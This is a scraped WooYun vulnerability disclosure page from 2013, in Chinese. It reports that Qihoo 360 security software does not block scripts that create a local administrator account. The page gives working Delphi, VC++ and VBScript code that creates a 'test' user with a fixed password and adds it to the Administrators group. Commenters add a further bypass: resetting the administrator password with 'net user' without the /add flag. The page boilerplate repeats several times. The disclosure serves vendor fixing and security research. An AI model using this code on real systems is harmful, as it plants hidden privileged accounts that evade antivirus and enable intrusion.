绕过360拦截添加用户！ | wooyun-2013-022498| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-022498

漏洞标题：绕过360拦截添加用户！

漏洞作者：小红帽

提交时间：2013-04-25 15:58

修复时间：2013-07-24 15:59

公开时间：2013-07-24 15:59

漏洞类型：权限提升

危害等级：低

自评Rank：3

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-04-25：细节已通知厂商并且等待厂商处理中
2013-04-25：厂商已经确认，细节仅向厂商公开
2013-04-28：细节向第三方安全合作伙伴开放
2013-06-19：细节向核心白帽子及相关领域专家公开
2013-06-29：细节向普通白帽子公开
2013-07-09：细节向实习白帽子公开
2013-07-24：细节向公众公开

简要描述：

绕过360拦截添加用户！

详细说明：

delphi:

var
 f:textfile;
 begin
assignfile(f,'x.vbs');
rewrite(f);
writeln(f,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")');
writeln(f,'os="WinNT://"&wsnetwork.ComputerName');
writeln(f,'Set ob=GetObject(os)');
writeln(f,'Set oe=GetObject(os&"/Administrators,group")');
writeln(f,'Set od=ob.Create("user","test")');
writeln(f,'od.SetPassword "gaimima"');
writeln(f,'od.SetInfo');
writeln(f,'Set of=GetObject(os&"/test",user)');
writeln(f,'oe.add os&"/test" ');
closefile(f);
//winexec('x.vbs', SW_HIDE);
ShellExecute(0,'open','x.vbs',nil,nil,sw_show);
application.MessageBox('user:test'+#13#10+'pass:gaimima','提示!',0);
deletefile('x.vbs');
end;

VC：

DWORD dwLevel = 1;
		USER_INFO_1 ui; 
		DWORD dwError = 0;
		USES_CONVERSION;
		LPWSTR name = A2W(m_netuser);
		LPWSTR pwd = A2W(m_netpass);
		LPWSTR Administrators = A2W(m_admin);
		ui.usri1_name =(WCHAR * )name;    //这个是要添加的用户名，可以自己改改
		ui.usri1_password =(WCHAR * )pwd;   //这个是用户密码，也可以自己改改
		ui.usri1_priv = USER_PRIV_USER; 
		ui.usri1_home_dir = NULL; //本地路劲
		ui.usri1_comment =L"系统管理员";// 描述
		ui.usri1_flags = UF_SCRIPT; 
		ui.usri1_script_path = NULL; //登陆脚本  
		NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
		wchar_t szAccountName[100]={0};
		wcscpy(szAccountName,ui.usri1_name); 
		LOCALGROUP_MEMBERS_INFO_3 account;
		account.lgrmi3_domainandname=szAccountName; 
		//添加到Administrators组
    	NetLocalGroupAddMembers(NULL,Administrators,3,(LPBYTE)&account,1);
		SetDlgItemText(IDC_Log,"添加成功.......");

不光360，其他的安全类也拦截不到吧。。貌似mysql。sqlserver的添加用户也拦截不到

漏洞证明：

set wsnetwork=CreateObject("WSCRIPT.NETWORK")'
os="WinNT://"&wsnetwork.ComputerName'
Set ob=GetObject(os)'
Set oe=GetObject(os&"/Administrators,group")'
Set od=ob.Create("user","test")'
od.SetPassword "gaimima"'
od.SetInfo');
Set of=GetObject(os&"/test",user)'
oe.add os&"/test" '

保存为vbs运行 360无反映

修复方案：

你们专业的

版权声明：转载请注明来源小红帽@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2013-04-25 18:14

厂商回复：

感谢反馈，该问题已着手解决。

漏洞评价：

2013-04-25 15:59 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

mark
2013-04-25 16:04 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

要火
2013-04-25 16:14 | baiduge ( 路人 | Rank:12 漏洞数:2 | 致力于脚本渗透目前专注XSS)

要火
2013-04-25 16:19 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

要火
2013-04-25 16:25 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

要火！
2013-04-25 16:29 | abcdlzy ( 实习白帽子 | Rank:79 漏洞数:14 | 好好学习，天天向上。)

要火这是要刷1WRMB的节奏么
2013-04-25 16:39 | p.z ( 普通白帽子 | Rank:411 漏洞数:40 )

给钱
2013-04-25 17:04 | June ( 实习白帽子 | Rank:36 漏洞数:1 | 姐姐妳小时候给猪亲过啊？)

自评：危害等级：低估计要鸡肋
2013-04-25 17:07 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人，智慧低调又内敛，俗称马甲...)

表示绕过360 绕过安全狗鄙人都有方法。自己研发木有提交 ~
2013-04-25 18:52 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

添加用户最多的场景应该是服务器，PC应该比较少见
2013-04-25 20:14 | Defa ( 普通白帽子 | Rank:113 漏洞数:13 | <img src=1 onerror=alert(1)>)

mark
2013-04-25 23:55 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

以后遇到360 就不能添加了吧？
2013-04-26 10:18 | 漏洞不是用来公开的 ( 路人 | Rank:9 漏洞数:3 | 心存迷惑的话谁都会丧失斗志失去力量)

真不明白为什么要报出来，必将被钉到历史的耻辱柱上！
2013-04-26 10:35 | by_奇奇 ( 实习白帽子 | Rank:35 漏洞数:7 | 2)

/ad ???
2013-04-26 12:09 | Drizzle.Risk ( 普通白帽子 | Rank:255 漏洞数:19 | You have an error in your SQL syntax; ch...)

服务器上.. 提权后是能直接Kill掉360的...
2013-04-26 12:32 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人，智慧低调又内敛，俗称马甲...)

拦截的参数是 /add /ad之类的参数。如果我们执行net user administrator wooyun 这个命令不带/add 参数他就不会拦截。
2013-05-16 02:07 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

@Black Angel 不带参数怎么添加用户
2013-05-16 12:24 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人，智慧低调又内敛，俗称马甲...)

@iiiiiiiii 你可以测试一下。不是添加用户命令这个net user administrator wooyun 不带/add或者/ad 参数也是一个命令。是修改administrator这个帐号密码为wooyun 不管是360还是安全狗都不会拦截这个。一次偶然提权中发现的。
2013-05-22 21:19 | 黑匣子 ( 实习白帽子 | Rank:64 漏洞数:17 | 我是一个有思想的菜鸟！)

@Black Angel 很早就被封了
2013-05-22 22:12 | Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人，智慧低调又内敛，俗称马甲...)

@黑匣子表示头几天提权还遇到了。。。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-022498

漏洞标题：绕过360拦截添加用户！

相关厂商：奇虎360

漏洞作者：小红帽

提交时间：2013-04-25 15:58

修复时间：2013-07-24 15:59

公开时间：2013-07-24 15:59

漏洞类型：权限提升

危害等级：低

自评Rank：3

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小红帽@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-022498

漏洞标题：绕过360拦截添加用户！

相关厂商：奇虎360

漏洞作者： 小红帽

提交时间：2013-04-25 15:58

修复时间：2013-07-24 15:59

公开时间：2013-07-24 15:59

漏洞类型：权限提升

危害等级：低

自评Rank：3

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-022498"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小红帽@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小红帽

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小红帽@乌云